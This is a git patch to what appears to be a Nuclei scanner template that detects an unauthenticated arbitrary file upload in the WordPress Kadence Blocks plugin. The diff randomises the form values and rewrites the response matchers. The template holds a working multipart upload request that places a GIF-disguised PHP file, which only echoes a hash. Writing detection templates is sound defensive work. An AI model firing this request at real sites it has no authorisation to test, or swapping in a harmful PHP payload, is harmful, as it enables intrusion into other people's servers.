From 46ff6b8912a1d242536c29e671b452323adcdb2d Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 20 Oct 2023 20:27:14 +0530
Subject: [PATCH] updated matcher

---
 .../wordpress/wp-kadence-blocks-rce.yaml      | 34 +++++++------------
 1 file changed, 12 insertions(+), 22 deletions(-)

diff --git a/http/vulnerabilities/wordpress/wp-kadence-blocks-rce.yaml b/http/vulnerabilities/wordpress/wp-kadence-blocks-rce.yaml
index a338e9c546..15b212b194 100644
--- a/http/vulnerabilities/wordpress/wp-kadence-blocks-rce.yaml
+++ b/http/vulnerabilities/wordpress/wp-kadence-blocks-rce.yaml
@@ -1,7 +1,7 @@
 id: wp-kadence-blocks-rce
 
 info:
-  name: WordPress Gutenberg Blocks by Kadence Blocks Plugin <= 3.1.10 is vulnerable to Arbitrary File Upload
+  name: WordPress Gutenberg Blocks Plugin <= 3.1.10 - Arbitrary File Upload
   author: theamanrawat
   severity: critical
   description: |
@@ -10,8 +10,8 @@ info:
     - https://wordpress.org/plugins/kadence-blocks/
     - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kadence-blocks/kadence-blocks-3110-unauthenticated-arbitrary-file-upload
   metadata:
-    verified: "true"
-  tags: rce,wpscan,wordpress,wp-plugin,wp,kadence-blocks,unauthenticated
+    verified: true
+  tags: rce,wpscan,wordpress,wp-plugin,wp,kadence-blocks
 
 http:
   - raw:
@@ -27,22 +27,22 @@ http:
         -----------------------------8779924633391890046425977712
         Content-Disposition: form-data; name="fieldfb0b94-aa"
 
-        test
+        {{randstr}}
         -----------------------------8779924633391890046425977712
         Content-Disposition: form-data; name="fieldec6f26-c7"
 
-        test@test.com
+        {{randstr}}@email.com
         -----------------------------8779924633391890046425977712
         Content-Disposition: form-data; name="fieldc9b894-4c"
 
-        test
+        {{randstr}}
         -----------------------------8779924633391890046425977712
         Content-Disposition: form-data; name="field983473-0a"; filename="{{randstr}}.php"
         Content-Type: application/x-php
 
         GIF89a
 
-        <?php echo md5("pdteam");?>
+        <?php echo md5("{{randstr}}");?>
         -----------------------------8779924633391890046425977712
         Content-Disposition: form-data; name="_kb_adv_form_post_id"
 
@@ -61,24 +61,14 @@ http:
         {{nonce}}
         -----------------------------8779924633391890046425977712--
 
-    matchers-condition: and
     matchers:
-      - type: word
-        part: body_2
-        words:
-          - 'Submission Success, Thanks for getting in touch!'
-          - '"success":true'
+      - type: dsl
+        dsl:
+          - 'status_code_2 == 200'
+          - 'contains(header_2, "application/json")'
+          - 'contains_all(body_2, "Submission Success, Thanks for getting in touch!", "success\":true")'
         condition: and
 
-      - type: word
-        part: header_2
-        words:
-          - "application/json"
-
-      - type: status
-        status:
-          - 200
-
     extractors:
       - type: regex
         name: nonce